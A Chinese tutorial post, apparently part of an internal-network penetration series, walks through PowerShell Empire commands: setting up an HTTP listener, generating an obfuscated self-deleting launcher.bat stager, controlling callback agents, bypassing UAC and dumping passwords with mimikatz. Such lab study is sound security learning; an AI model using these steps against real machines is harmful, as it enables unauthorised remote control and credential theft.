内网渗透 day14-empire基础命令的使用
empire的基础操作
目录
1. 建立监听器
help 查看帮助命令
listeners 查看监听器
uselistener xxx 使用监听器模块
常用的监听模块:http
按两次tab键查看能使用的监听器模块
info 查看参数信息
设置参数
set Name xxx
set Host http://xxx
set Port xxx
执行:execute
main 返回主菜单
这边显示目前有一个活跃的监听器
2. 设置stagers
usestagers xxx 使用stager模块
常用的模块:windows/hta、windows/launcher_bat
按两次tab键查看能使用的stager模块
info 查看要设置的参数
set Listener xx 设置监听器
set OutFile /var/www/html/launcher.bat 设置文件生成路劲
delete 木马运行完是否自动删除
Obfuscate(混淆)
execute 执行
在靶机上双击bat文件成功反弹会话
3. 用户交互
agents 切换到用户列表
list 列出用户
rename 修改用户ID的名字
interact 进入到用户交互界面
sysinfo 查看系统信息
sc 截屏
searchmodule 搜索模块
shell + command 执行命令
spawn 迁移到新的用户需要指定监听器的名字
产生了一个新的会话
用户清除:
kill agents | all
监听器清除:
kill listener | all
4. 提权
bypassuac <listener> bypassuac绕过uac提权
可以看到产生了一个带*的会话,提权成功用户名前面会多一个*号
mimikatz 在拥有权限后可以利用mimikatz获取用户账号密码
creds 以列表的形式显示mimikatz获取的账号密码
uac提权(需要手动确认)
searchmodule ask 搜索ask模块
usemodule privesc/ask 使用privesc/ask模块
info 查看所需参数
设置监听器
run 执行
靶机弹出uac认证框
列表中产生新的管理员会话
最新文章
- 整理ViewController的生命周期和加载过程
- [http session]
- pytion学习1
- python+redis测试环境搭建
- redis 在centos下的安装部署
- Wcf资料收集
- Chrome 小工具: 启动本地应用 (Native messaging)
- WPS怎么让前几页的页眉或者页脚与后面的不同
- App 被拒 -- App Store Review Guidelines (2015)中英文对照
- Foundations of Game Engine Development Volume 1 Mathematics (Eric Lengyel 著)
- 【Teradata】配置PE和AMP(congfig和reconfig工具、vprocmanager)
- (转)HTTPS到底是个啥玩意儿?
- xshell中出现的绿色背景的文件夹
- bzoj4980: 第一题
- vue form表单绑定事件与方法
- XCache 一种快速可靠的PHP操作码缓存
- addEventListener的click和onclick的区别
- Java自学入门新的体会0.2
- zabbix 自定义 key (转)
- Java 之进制转换